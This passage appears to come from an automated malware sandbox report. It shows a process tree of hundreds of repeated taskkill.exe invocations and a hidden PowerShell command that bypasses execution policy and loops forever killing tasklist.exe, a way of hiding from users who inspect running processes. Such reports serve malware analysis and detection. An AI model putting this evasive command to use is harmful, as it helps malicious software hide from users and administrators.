    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3984
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4480
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1516
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:640
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2788
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4444
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2576
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1932
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4768
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2840
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2916
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4496
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2268
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2308
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1508
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4744
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1556
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:876
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3544
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3452
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        Kills process with taskkill
        
        PID:3872
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:116
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3156
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        Kills process with taskkill
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3700
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1716
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4684
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3184
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4288
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3160
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        Kills process with taskkill
        
        PID:2052
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        Kills process with taskkill
        
        PID:4272
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4684
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        Kills process with taskkill
        
        PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2664
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4964
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2160
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1240
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4288
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5068
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4696
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5000
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3004
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:5028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2668
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:3544
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:1332
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2328
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4164
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4524
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im taskkill.exe
        5⤵
        
        PID:2676
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -w hidden -c "while($true){ taskkill /f /im tasklist.exe}"
      4⤵
      PID:3908
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3364
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2920
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3604
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3292
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2724
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:5112
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4860
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2868
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4192
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4784
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2304
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1492
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3996
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2676
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:5032
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3100
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3832
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3636
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2076
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:644
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4436
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2756
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1608
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1144
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        Kills process with taskkill
        
        PID:2572
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4412
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1300
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2336
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3604
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2656
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        Kills process with taskkill
        
        PID:4296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1356
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:796
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3044
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        Kills process with taskkill
        
        PID:3012
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1300
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4324
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2632
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2824
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4296
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1780
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:880
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4028
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4808
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:3588
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4820
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:844
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:4812
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1108
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2328
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:2276
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\system32\taskkill.exe" /f /im tasklist.exe
        5⤵
        
        PID:1036
